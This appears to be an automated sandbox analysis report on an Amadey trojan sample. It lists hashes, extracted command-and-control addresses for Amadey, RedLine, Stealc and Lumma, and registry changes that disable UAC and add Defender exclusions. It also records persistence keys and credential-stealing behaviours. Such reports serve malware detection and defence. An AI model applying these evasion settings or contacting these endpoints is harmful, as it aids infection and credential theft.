amadey | cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976

Analysis

max time kernel
299s
max time network
296s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
05-05-2024 22:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976.exe
Size

1.9MB
MD5

0d1e278fffdf78a7a565c14c23faa429
SHA1

ff51290aa5f5bc15004de00a727283474a9b2980
SHA256

cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976
SHA512

84a027d91fe1a83238719892087aab6890025d89cead0ba6575cc219d5074d610898e0be780f667b271e9a2dec07d0eb653b330ffb831cc2df3933d4f915aa0c
SSDEEP

49152:wKkZGPrfnwGgjJf3j8PCKvkdg8E2gdFd/+PBqI+K+lK:wKrrfwG6f3jG8dREVFC4

Malware Config

Extracted

Family

amadey

Version

4.18

http://193.233.132.56

Attributes

install_dir
09fd851a4f
install_file
explorha.exe
strings_key
443351145ece4966ded809641c77cfa8
url_paths
/Pneh2sXQk0/index.php

rc4.plain

Extracted

Family

redline

Botnet

Test1234

185.215.113.67:26260

Extracted

Family

stealc

http://52.143.157.84

Attributes

url_path
/c73eed764cc59dcb.php

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

185.172.128.33:8970

Extracted

Family

lumma

https://affordcharmcropwo.shop/api

https://cleartotalfisherwo.shop/api

https://worryfillvolcawoi.shop/api

https://enthusiasimtitleow.shop/api

https://dismissalcylinderhostw.shop/api

https://diskretainvigorousiw.shop/api

https://communicationgenerwo.shop/api

https://pillowbrocccolipe.shop/api

https://zippyfinickysofwps.shop/api

https://acceptabledcooeprs.shop/api

https://obsceneclassyjuwks.shop/api

https://miniaturefinerninewjs.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect ZGRat V1 4 IoCs

resource	yara_rule
behavioral2/memory/4620-243-0x0000000000400000-0x0000000000592000-memory.dmp	family_zgrat_v1
behavioral2/files/0x000800000001ac32-260.dat	family_zgrat_v1
behavioral2/memory/576-294-0x0000000000490000-0x0000000000550000-memory.dmp	family_zgrat_v1
behavioral2/memory/4540-2443-0x0000022B7AEC0000-0x0000022B7E7B8000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma

Modifies firewall policy service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	QVm3NMEvSDXvgsDecjeqkD2d.exe

PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 6 IoCs

resource	yara_rule
behavioral2/files/0x000800000001abef-41.dat	family_redline
behavioral2/memory/1604-49-0x0000000000460000-0x00000000004B2000-memory.dmp	family_redline
behavioral2/files/0x000800000001ac2f-258.dat	family_redline
behavioral2/memory/2348-265-0x0000000000F80000-0x0000000000FD2000-memory.dmp	family_redline
behavioral2/files/0x000800000001ac32-260.dat	family_redline
behavioral2/memory/576-294-0x0000000000490000-0x0000000000550000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe

Windows security bypass 2 TTPs 11 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\4767d2e713f2021e8fe856e3ea638b58.exe = "0"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\GzmpmDfyoCO6lj4EiC4zaiUe.exe = "0"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\uEAAbQEzg9PcN7EIkFWxWns4.exe = "0"	uEAAbQEzg9PcN7EIkFWxWns4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\8It8hjPMoumclIlCgjwjVbXd.exe = "0"	8It8hjPMoumclIlCgjwjVbXd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\9AtHbSgIGRVSfqxpWWxVr0VR.exe = "0"	9AtHbSgIGRVSfqxpWWxVr0VR.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/files/0x000700000001ac51-528.dat	family_xmrig
behavioral2/files/0x000700000001ac51-528.dat	xmrig

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	QVm3NMEvSDXvgsDecjeqkD2d.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorha.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
86	776	rundll32.exe
93	1292	rundll32.exe
155	5280	rundll32.exe
93	1292	rundll32.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 36 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
628	powershell.exe
4004	powershell.exe
5864	powershell.exe
5532	powershell.exe
6096	powershell.exe
4360	powershell.exe
4784	powershell.exe
6096	powershell.exe
5492	powershell.exe
6032	powershell.exe
5536	powershell.exe
5880	powershell.exe
5224	powershell.exe
1084	powershell.exe
5800	powershell.exe
4952	powershell.exe
2596	powershell.exe
2028	powershell.exe
5372	powershell.exe
5268	powershell.exe
5044	powershell.exe
6072	powershell.exe
5044	powershell.exe
404	powershell.exe
608	powershell.exe
5180	powershell.exe
5744	powershell.EXE
1304	powershell.exe
5432	powershell.exe
1388	powershell.exe
5800	powershell.exe
6100	powershell.exe
5884	powershell.exe
5896	powershell.exe
2536	powershell.exe
3848	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 5 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1492	netsh.exe
4452	netsh.exe
5712	netsh.exe
6060	netsh.exe
3832	netsh.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 19 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	QVm3NMEvSDXvgsDecjeqkD2d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	QVm3NMEvSDXvgsDecjeqkD2d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorha.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation	ZWmybuD.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\International\Geo\Nation	dzqjbCr.exe

Drops startup file 9 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1An1qVlHWFap0jWS97DER5cy.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VBhrI2cguP5tbi2lWq4vPDb3.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YNOWcCbXKPDxchySrSZKLQpF.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\j3uhL1RsdczWOswdSXAdI8S5.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aTlsrhQ43UOvGoiEfQlpdIfN.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DKKprtHfSzdoK09OmTdoi6VG.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VhGbNqxheHOnH4zUn6IO6DI8.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3OZ3PFLIocvBjPILqCs08ogB.bat	regasm.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9NXYKzaMcJOws43CVIDHFICK.bat	regasm.exe

Executes dropped EXE 64 IoCs

pid	Process
208	explorha.exe
4456	swiiiii.exe
1604	jok.exe
1560	swiiii.exe
2316	file300un.exe
1028	gold.exe
2064	lXrmYBTzRx1MeZ6q1ZRuprdW.exe
1124	alexxxxxxxx.exe
5056	GzmpmDfyoCO6lj4EiC4zaiUe.exe
2348	keks.exe
576	trf.exe
4436	uEAAbQEzg9PcN7EIkFWxWns4.exe
4452	8It8hjPMoumclIlCgjwjVbXd.exe
4676	9AtHbSgIGRVSfqxpWWxVr0VR.exe
2612	install.exe
5064	GameService.exe
688	GameService.exe
1508	GameService.exe
2984	GameService.exe
2000	GameService.exe
1856	GameSyncLink.exe
3880	NewB.exe
2984	GameService.exe
5216	GameService.exe
5236	GameService.exe
5256	GameService.exe
5272	GameService.exe
5328	PiercingNetLink.exe
5408	ISetup8.exe
5516	GameService.exe
5536	GameService.exe
5584	GameService.exe
5600	GameSyncLink.exe
5620	GameService.exe
5668	GameSyncLinks.exe
5772	QVm3NMEvSDXvgsDecjeqkD2d.exe
5972	toolspub1.exe
5988	PiercingNetLink.exe
6104	GameSyncLinks.exe
1336	oBSjUVkTwfKo2SE27ZbSDItd.exe
5244	Install.exe
1008	GameSyncLink.exe
2856	4767d2e713f2021e8fe856e3ea638b58.exe
1328	explorha.exe
5140	PiercingNetLink.exe
5460	GameSyncLinks.exe
5824	NewB.exe
5664	Install.exe
3812	GameSyncLink.exe
3088	hUuIIft1fIqJWNIbFOzrYN6r.exe
2052	Install.exe
6052	PiercingNetLink.exe
5128	GameSyncLinks.exe
4360	Install.exe
5420	GameSyncLink.exe
6112	PiercingNetLink.exe
4204	GameSyncLinks.exe
4156	dzqjbCr.exe
1028	ZWmybuD.exe
5748	GameSyncLink.exe
2540	PiercingNetLink.exe
912	GameSyncLinks.exe
5532	explorha.exe
3716	NewB.exe

Identifies Wine through registry keys 2 TTPs 7 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	cd729dfc0822e7934b558cf3c6e5a1400221ee02d7ebba1eb982b8059dc80976.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorha.exe
Key opened	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Wine	explorha.exe

Loads dropped DLL 6 IoCs

pid	Process
4248	rundll32.exe
776	rundll32.exe
1292	rundll32.exe
5280	rundll32.exe
96	u1lc.0.exe
96	u1lc.0.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/memory/5772-456-0x0000000140000000-0x0000000140861000-memory.dmp	themida
behavioral2/memory/5772-589-0x0000000140000000-0x0000000140861000-memory.dmp	themida

Windows security modification 2 TTPs 11 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\uEAAbQEzg9PcN7EIkFWxWns4.exe = "0"	uEAAbQEzg9PcN7EIkFWxWns4.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\8It8hjPMoumclIlCgjwjVbXd.exe = "0"	8It8hjPMoumclIlCgjwjVbXd.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\GzmpmDfyoCO6lj4EiC4zaiUe.exe = "0"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\9AtHbSgIGRVSfqxpWWxVr0VR.exe = "0"	9AtHbSgIGRVSfqxpWWxVr0VR.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\4767d2e713f2021e8fe856e3ea638b58.exe = "0"	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	GzmpmDfyoCO6lj4EiC4zaiUe.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	GzmpmDfyoCO6lj4EiC4zaiUe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	9AtHbSgIGRVSfqxpWWxVr0VR.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	uEAAbQEzg9PcN7EIkFWxWns4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	8It8hjPMoumclIlCgjwjVbXd.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	4767d2e713f2021e8fe856e3ea638b58.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	file300un.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	QVm3NMEvSDXvgsDecjeqkD2d.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	file300un.exe

Drops Chrome extension 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json	ZWmybuD.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	ZWmybuD.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	dzqjbCr.exe

Drops desktop.ini file(s) 1 IoCs

description	ioc	Process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	Install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
47	pastebin.com
50	pastebin.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
111	api.myip.com
112	api.myip.com
113	ipinfo.io
114	ipinfo.io

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 62 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	dzqjbCr.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	ZWmybuD.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	QVm3NMEvSDXvgsDecjeqkD2d.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	ZWmybuD.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	dzqjbCr.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	QVm3NMEvSDXvgsDecjeqkD2d.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719	dzqjbCr.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	dzqjbCr.exe
